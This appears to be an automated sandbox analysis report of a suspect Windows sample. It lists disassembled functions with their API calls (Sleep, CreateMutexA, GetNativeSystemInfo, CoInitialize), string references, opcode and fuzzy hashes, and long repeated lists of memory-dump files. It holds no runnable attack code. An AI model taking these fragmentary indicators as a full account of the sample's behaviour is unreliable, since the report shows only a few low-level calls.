Associated: 00000000.00000002.268883548086.000000000094E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883576832.000000000094F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883608621.0000000000967000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883635943.0000000000968000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883662196.0000000000969000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883693841.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883742504.000000000096F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883778624.000000000097D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883809678.000000000097E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2l
API String ID: 1464230837-1031808636
Opcode ID: b95334d4e4bcc7e26e5448ba00ac90829d4ef19582a9baf7db23f0c3bfea0ef7
Instruction ID: 98dbb410505ff900e5c1da93d2220bd00287d603159df479a9fa97884dd292b0
Opcode Fuzzy Hash: b95334d4e4bcc7e26e5448ba00ac90829d4ef19582a9baf7db23f0c3bfea0ef7
Instruction Fuzzy Hash: FD314871604200CBEB08DBB8DE89BADBB73EF81310F348658E414EB3D5D73599808B56

Function 00669ADC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 0066A963
CreateMutexA.KERNEL32(00000000,00000000,006C3254), ref: 0066A981

Strings

T2l, xrefs: 0066A970

Memory Dump Source

Source File: 00000000.00000002.268881224962.0000000000661000.00000040.00000001.01000000.00000003.sdmp, Offset: 00660000, based on PE: true

Associated: 00000000.00000002.268881159750.0000000000660000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881224962.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881428812.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881494212.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881563416.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881936611.0000000000836000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882002715.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882082303.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882148117.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882216423.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882216423.000000000085C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882294346.000000000085F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882325046.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882368787.0000000000862000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882399080.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882430149.0000000000864000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882464300.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882493312.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882522058.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882555423.000000000086F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882587428.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882633917.0000000000889000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882665288.000000000088B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882693750.000000000088C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882723575.000000000088D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882748482.000000000088E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882779239.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882809788.0000000000895000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882843328.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882883171.000000000089E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882928228.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882983295.00000000008B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883015972.00000000008BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883054349.00000000008C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883087341.00000000008C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883118586.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883166835.00000000008D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883196548.00000000008D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883226192.00000000008D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883275775.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883306152.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883336882.00000000008EB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883368208.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883405036.00000000008FB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883434356.00000000008FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883434356.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883548086.000000000094E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883576832.000000000094F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883608621.0000000000967000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883635943.0000000000968000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883662196.0000000000969000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883693841.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883742504.000000000096F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883778624.000000000097D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883809678.000000000097E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2l
API String ID: 1464230837-1031808636
Opcode ID: e01c5edfcdd6b5147b15d37361e2f9081b91df026c63c643be51155ada126f8a
Instruction ID: 70e4c4239828f343c3e87fc7d39c052d45959f37c7107df95df1438979f61386
Opcode Fuzzy Hash: e01c5edfcdd6b5147b15d37361e2f9081b91df026c63c643be51155ada126f8a
Instruction Fuzzy Hash: AE213731614200DBEB189BA8ED89B6DB767EFC1310F20861DE908D73E9DB755A808B16

Function 0066A856 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 0066A963
CreateMutexA.KERNEL32(00000000,00000000,006C3254), ref: 0066A981

Strings

T2l, xrefs: 0066A970

Memory Dump Source

Source File: 00000000.00000002.268881224962.0000000000661000.00000040.00000001.01000000.00000003.sdmp, Offset: 00660000, based on PE: true

Associated: 00000000.00000002.268881159750.0000000000660000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881224962.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881428812.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881494212.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881563416.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881936611.0000000000836000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882002715.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882082303.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882148117.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882216423.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882216423.000000000085C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882294346.000000000085F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882325046.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882368787.0000000000862000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882399080.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882430149.0000000000864000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882464300.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882493312.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882522058.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882555423.000000000086F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882587428.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882633917.0000000000889000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882665288.000000000088B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882693750.000000000088C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882723575.000000000088D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882748482.000000000088E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882779239.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882809788.0000000000895000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882843328.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882883171.000000000089E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882928228.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882983295.00000000008B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883015972.00000000008BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883054349.00000000008C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883087341.00000000008C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883118586.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883166835.00000000008D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883196548.00000000008D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883226192.00000000008D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883275775.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883306152.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883336882.00000000008EB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883368208.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883405036.00000000008FB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883434356.00000000008FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883434356.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883548086.000000000094E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883576832.000000000094F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883608621.0000000000967000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883635943.0000000000968000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883662196.0000000000969000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883693841.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883742504.000000000096F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883778624.000000000097D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883809678.000000000097E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2l
API String ID: 1464230837-1031808636
Opcode ID: 948b14f19cfb975881b4780cdd650966e723cd6316dc8078b184d5aaf7295837
Instruction ID: 45e2ebda64c696a819dd11a1b264080abc5ec9209afceced131a20b1a808c8e2
Opcode Fuzzy Hash: 948b14f19cfb975881b4780cdd650966e723cd6316dc8078b184d5aaf7295837
Instruction Fuzzy Hash: 0C216D71258200CBFB2467E89986BBDB353EFC1304F244D1EE508F73D6CA7A59818A93

Function 0066A34F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 0066A963
CreateMutexA.KERNEL32(00000000,00000000,006C3254), ref: 0066A981

Strings

T2l, xrefs: 0066A970

Memory Dump Source

Source File: 00000000.00000002.268881224962.0000000000661000.00000040.00000001.01000000.00000003.sdmp, Offset: 00660000, based on PE: true

Associated: 00000000.00000002.268881159750.0000000000660000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881224962.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881428812.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881494212.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881563416.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881936611.0000000000836000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882002715.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882082303.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882148117.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882216423.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882216423.000000000085C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882294346.000000000085F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882325046.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882368787.0000000000862000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882399080.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882430149.0000000000864000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882464300.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882493312.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882522058.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882555423.000000000086F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882587428.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882633917.0000000000889000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882665288.000000000088B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882693750.000000000088C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882723575.000000000088D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882748482.000000000088E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882779239.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882809788.0000000000895000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882843328.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882883171.000000000089E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882928228.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882983295.00000000008B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883015972.00000000008BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883054349.00000000008C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883087341.00000000008C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883118586.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883166835.00000000008D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883196548.00000000008D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883226192.00000000008D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883275775.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883306152.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883336882.00000000008EB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883368208.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883405036.00000000008FB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883434356.00000000008FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883434356.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883548086.000000000094E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883576832.000000000094F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883608621.0000000000967000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883635943.0000000000968000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883662196.0000000000969000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883693841.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883742504.000000000096F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883778624.000000000097D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883809678.000000000097E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2l
API String ID: 1464230837-1031808636
Opcode ID: e3b218bdb4b493a19f4ef57909169cda248bd8fcec5dd94d12e95286153a2ce7
Instruction ID: 6495876fb16f3c6b9aaa45ce393f4387556f369ce19500a7d368fe2fa6823856
Opcode Fuzzy Hash: e3b218bdb4b493a19f4ef57909169cda248bd8fcec5dd94d12e95286153a2ce7
Instruction Fuzzy Hash: C7213732614200DBEB189BA8DD85B6CB763EFD1310F34861DE508F77D9D776AA808B52

Function 00667D30 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 426
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00667ED3

Strings

Wce , xrefs: 00667D5B

Memory Dump Source

Source File: 00000000.00000002.268881224962.0000000000661000.00000040.00000001.01000000.00000003.sdmp, Offset: 00660000, based on PE: true

Associated: 00000000.00000002.268881159750.0000000000660000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881224962.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881428812.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881494212.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881563416.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881936611.0000000000836000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882002715.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882082303.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882148117.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882216423.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882216423.000000000085C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882294346.000000000085F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882325046.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882368787.0000000000862000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882399080.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882430149.0000000000864000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882464300.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882493312.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882522058.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882555423.000000000086F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882587428.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882633917.0000000000889000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882665288.000000000088B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882693750.000000000088C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882723575.000000000088D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882748482.000000000088E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882779239.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882809788.0000000000895000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882843328.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882883171.000000000089E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882928228.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882983295.00000000008B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883015972.00000000008BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883054349.00000000008C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883087341.00000000008C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883118586.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883166835.00000000008D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883196548.00000000008D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883226192.00000000008D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883275775.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883306152.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883336882.00000000008EB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883368208.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883405036.00000000008FB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883434356.00000000008FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883434356.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883548086.000000000094E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883576832.000000000094F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883608621.0000000000967000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883635943.0000000000968000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883662196.0000000000969000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883693841.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883742504.000000000096F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883778624.000000000097D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883809678.000000000097E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_file.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: Wce
API String ID: 1721193555-518726228
Opcode ID: 2595da96b9838413c646685fc4bbb21140bc8986f6933772c9478523cd2d2a1f
Instruction ID: f715f1ed8fb0eaeaf75877f0dad8600386b1b738c9ed7350dacc17bfa2f964ad
Opcode Fuzzy Hash: 2595da96b9838413c646685fc4bbb21140bc8986f6933772c9478523cd2d2a1f
Instruction Fuzzy Hash: B1E10670E002449BDB64BB78CC177AD7A63AB41724F94429CE8196B3C2DF354F958BC6

Function 0066B1A0 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 244COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0066B3C7

Strings

Wce , xrefs: 0066B1B7

Memory Dump Source

Source File: 00000000.00000002.268881224962.0000000000661000.00000040.00000001.01000000.00000003.sdmp, Offset: 00660000, based on PE: true

Associated: 00000000.00000002.268881159750.0000000000660000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881224962.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881428812.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881494212.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881563416.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881936611.0000000000836000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882002715.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882082303.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882148117.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882216423.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882216423.000000000085C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882294346.000000000085F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882325046.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882368787.0000000000862000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882399080.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
